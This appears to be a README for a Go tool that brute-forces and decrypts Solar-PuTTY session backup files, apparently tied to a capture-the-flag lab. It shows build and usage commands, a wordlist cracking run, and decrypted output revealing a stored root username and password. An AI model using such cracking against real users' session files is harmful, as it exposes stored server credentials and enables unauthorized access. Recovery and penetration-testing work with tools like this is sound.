SolarPutty's sessions files decryptor / bruteforce
git clone
cd go-SolarPuttyDecrypt
go mod tidy
go build
./go-SolarPuttyDecrypt -h
Usage of ./go-SolarPuttyDecrypt:
-password string
Password to decrypt the session file
-session string
SolarPutty session file path [required]
-threads int
Number of threads to use (default 16)
-wordlist string
Wordlist file path
./go-SolarPuttyDecrypt -session sessions-backup.dat -wordlist wordlist.txt
SolarPutty's Sessions Bruteforce Decrypter in go
[0.65% done] [93775/14344393] [16162 p/s] Trying: misperros
./go-SolarPuttyDecrypt -session sessions-backup.dat -password password
SolarPutty's Sessions Bruteforce Decrypter in go
password: password
"AuthScript": [],
"Credentials": [
"CredentialsName": "instant-root",
"Id": "452ed919-530e-419b-b721-da76cbe8ed04",
"Passphrase": "",
"Password": "123456789",
"PrivateKeyContent": null,
"PrivateKeyPath": "",
"Username": "root"
"Groups": [],
"LogsFolderDestination": "C:\\ProgramData\\SolarWinds\\Logs\\Solar-PuTTY\\SessionLogs",